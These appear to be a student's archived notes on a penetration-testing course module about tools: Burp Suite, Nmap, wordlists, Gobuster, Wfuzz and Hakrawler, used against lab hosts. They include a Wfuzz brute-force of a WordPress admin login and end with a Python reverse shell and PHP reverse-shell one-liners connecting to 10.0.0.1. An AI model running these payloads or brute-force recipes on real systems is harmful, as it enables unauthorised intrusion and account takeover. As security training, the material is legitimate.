Module 2: Tools (archived)
This topic has either been replaced or deprecated and is not required for any exams or assessments. The content remains available for those seeking additional research and learning opportunities.
Getting Started
Accessing The Lab Machines
Updated your /etc/hosts file for the labs. IPs change, make sure they're updated when they do.
About Proxies
The "middleman".
Burp Suite
Burp Suite's Built-In Browser
Proxy > Open Browser.
Using Burp Suite with Other Browsers
Proxy settings: 127.0.0.1 port 8080;
Proxy
Proxy manages interception of web traffic.
Intercept:
Forward: pass the web request along.
Drop: discard this request.
HTTP History:
Sort all pages visited and traffic forwarded in sequential order.
Options:
Add/Edit/Delete proxy settings.
Match & Replace to modify requests/responses .
Intruder
Used for modifying request/responses to attack the target with payloads. ex. brute forcing a login page.
These requests are throttled in the Community edition.
Repeater
Replays requests/responses, allowing us to modify them for testing purposes.
Inspector is available inside the Repeater tab, allowing decoding as well as viewing various attributes and headers with ease.
Extra Mile
This is just the lab.
Nmap
Nmap Scripts
List of scripts can be found at /usr/share/nmap/scripts/.
Use the -sC or --script option for running scripts with the Nmap scripting engine (NSE).
Extra Mile
Doing the lab.
Wordlists
SecLists Installation
Just apt install seclists.
Choosing a Wordlist
SecLists are split up into categories, make yourself familiar with them.
Building Custom Wordlists
Cewl can be used to crawl a webpage, generating a wordlist. The -d switch can be used to set the depth of the crawl. The -m switch sets the minimum word length.
Example usage of cewl
kali@kali:~$ sudo cewl -d 2 -m 5 -w ourWordlist.txt www.MegaCorpOne.com
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
kali@kali:~$ ls -lsa ourWordlist.txt
4 -rw-r--r-- 1 root root 2788 Oct 9 23:24 ourWordlist.txtGobuster
Installing Gobuster & Basic Usage
Just apt install gobuster.
Endpoint Discovery with Gobuster
Example usage of gobuster
kali@kali:~$ gobuster dir -u $URL -w /usr/share/wordlists/dirb/common.txt -t 5 -b 301
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://offsecwp:80/
[+] Method: GET
[+] Threads: 5
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 301
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/07 17:19:44 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 273]
/.htaccess (Status: 403) [Size: 273]
/.htpasswd (Status: 403) [Size: 273]
/server-status (Status: 403) [Size: 273]
/xmlrpc.php (Status: 405) [Size: 42]
...Go Bust Those Subdomains!
Subdomain busting example
kali@kali:~$ gobuster dns -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 30Wfuzz
File Discovery
Fuzzing files with wfuzz
kali@kali:~$ export URL="http://offsecwp:80/FUZZ"
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --hc 301,404,403 "$URL"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp/FUZZ
Total requests: 17128
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000028: 200 100 L 450 W 6798 Ch "wp-login.php"
000000001: 301 0 L 0 W 0 Ch "index.php"
000000005: 405 0 L 6 W 42 Ch "xmlrpc.php"
000000122: 200 97 L 823 W 7345 Ch "readme.html"
000000198: 200 384 L 3177 W 19915 Ch "license.txt"
000000255: 200 0 L 0 W 0 Ch "wp-config.php"
000000289: 200 4 L 15 W 135 Ch "wp-trackback.php"
000000369: 500 0 L 0 W 0 Ch "wp-settings.php"
000000371: 301 0 L 0 W 0 Ch "."
000000405: 200 0 L 0 W 0 Ch "wp-cron.php"
000000440: 200 0 L 0 W 0 Ch "wp-blog-header.php"
000000454: 200 11 L 23 W 221 Ch "wp-links-opml.php"
000000830: 200 0 L 0 W 0 Ch "wp-load.php"
000001065: 302 0 L 0 W 0 Ch "wp-signup.php"
000001499: 302 0 L 0 W 0 Ch "wp-activate.php"
Total time: 0
Processed Requests: 17128
Filtered Requests: 17113
Requests/sec.: 0Directory Discovery
Directory discovery with wfuzz
kali@kali:~$ export URL="http://offsecwp:80/FUZZ/"
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --hc 404,403,301 "$URL"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp/FUZZ/
Total requests: 30000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000013: 200 0 L 0 W 0 Ch "wp-content"
000000020: 302 0 L 0 W 0 Ch "wp-admin"
Total time: 0
Processed Requests: 29990
Filtered Requests: 29987
Requests/sec.: 0Parameter Discovery
Discovering hidden parameters
kali@kali:~$ export URL="http://offsecwp:80/index.php?FUZZ=data"
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404,301 "$URL"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp/index.php?FUZZ=data
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000031: 200 216 L 3219 W 38443 Ch "s"
000000051: 200 258 L 3358 W 40363 Ch "preview"
000001169: 200 4 L 15 W 135 Ch "tb"
Total time: 0
Processed Requests: 2588
Filtered Requests: 2585
Requests/sec.: 0Fuzzing Parameter Values
Identifying the erroneous response size
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Usernames/cirt-default-usernames.txt --hc 404 http://offsecwp:80/index.php?fpv=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp:80/index.php?fpv=FUZZ
Total requests: 828
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000015: 301 0 L 0 W 0 Ch "22222222"
000000035: 301 0 L 0 W 0 Ch "APPLSYSPUB"
000000036: 301 0 L 0 W 0 Ch "APPS"
000000034: 301 0 L 0 W 0 Ch "APPLSYS"
000000003: 301 0 L 0 W 0 Ch "$SRV"
000000038: 301 0 L 0 W 0 Ch "AQ"
000000007: 301 0 L 0 W 0 Ch "(created)"
...Clean output with no erroneus responses and a successful result
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Usernames/cirt-default-usernames.txt --hc 404,301 http://offsecwp:80/index.php?fpv=FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp:80/index.php?fpv=FUZZ
Total requests: 828
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000791: 200 0 L 1 W 12 Ch "unix"
Total time: 0
Processed Requests: 828
Filtered Requests: 827
Requests/sec.: 0Fuzzing POST Data
Fuzzing POST Data & Brute Forcing a Login Page
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --hc 404 -d "log=admin&pwd=FUZZ" http://offsecwp:80/wp-login.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp:80/wp-login.php
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000013: 200 105 L 478 W 7201 Ch "abc123"
000000012: 200 105 L 478 W 7201 Ch "baseball"
000000010: 200 105 L 478 W 7201 Ch "dragon"
000000011: 200 105 L 478 W 7201 Ch "123123"
000000016: 200 105 L 478 W 7201 Ch "letmein"
000000003: 200 105 L 478 W 7201 Ch "12345678"
000000014: 200 105 L 478 W 7201 Ch "football"
000000001: 200 105 L 478 W 7201 Ch "123456"
000000007: 200 105 L 478 W 7201 Ch "1234"
000000015: 200 105 L 478 W 7201 Ch "monkey"
000000009: 200 105 L 478 W 7201 Ch "1234567"
000000005: 200 105 L 478 W 7201 Ch "123456789"
000000006: 200 105 L 478 W 7201 Ch "12345"
000000008: 200 105 L 478 W 7201 Ch "111111"
...Suppressing the results with char size 7201
kali@kali:~$ export URL="http://offsecwp:80/wp-login.php"
kali@kali:~$ wfuzz -c -z file,/usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt --hc 404 -d "log=admin&pwd=FUZZ" --hh 7201 "$URL"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://offsecwp/wp-login.php
Total requests: 100000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000002: 302 0 L 0 W 0 Ch "password" Extra Mile
Doing a lab.
Hakrawler
Hakrawler Installation
Just sudo apt install hakrawler.
Hakrawler and the Wayback Machine
Sample Output of Hakrawler on the megacorpone.com domain
kali@kali:~$ echo "https://www.megacorpone.com/" > urls.txt
kali@kali:~$ cat urls.txt |./hakrawler
https://www.megacorpone.com/index.html
https://www.megacorpone.com/index.html
https://www.megacorpone.com/about.html
https://www.megacorpone.com/contact.html
http://support.megacorpone.com
http://www.megacorpone.com/jobs.html
http://intranet.megacorpone.com
https://www.megacorpone.com/about.html
https://www.megacorpone.com/about.html
https://www.megacorpone.com/about.html
http://admin.megacorpone.com/admin/index.html
http://intranet.megacorpone.com/pear/
http://mail.megacorpone.com/menu/
http://mail2.megacorpone.com/smtp/relay/
http://siem.megacorpone.com/home/
http://support.megacorpone.com/ticket/requests/index.html
http://syslog.megacorpone.com/logs/sys/view.php
https://www.megacorpone.com/about.html
http://test.megacorpone.com/demo/index.php
http://vpn.megacorpone.com/diffie-hellman/
http://www.megacorpone.com/aboutus.html
http://www.megacorpone.com/aboutus.html
http://www.megacorpone.com/aboutus.html
http://www2.megacorpone.com/test/newsite/index.php
http://www2.megacorpone.com/test/newsite/index.php
http://www2.megacorpone.com/test/newsite/index.php
http://admin.megacorpone.com/news/today.php
...Shells
Web Technology
The shell we hope to spawn relies on the correct web technology used.
Choosing the Correct Shell
Use the correct shell for the correct system.
Payloads
Example Python Reverse Shell Payload
import socket
import subprocess
import os
import pty;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",80));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/bash")Example PHP Reverse Shell Payloads
php -r '$sock=fsockopen("10.0.0.1",80);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);popen("/bin/sh -i <&3 >&3 2>&3", "r");'Extra Mile
Do the lab.
Last updated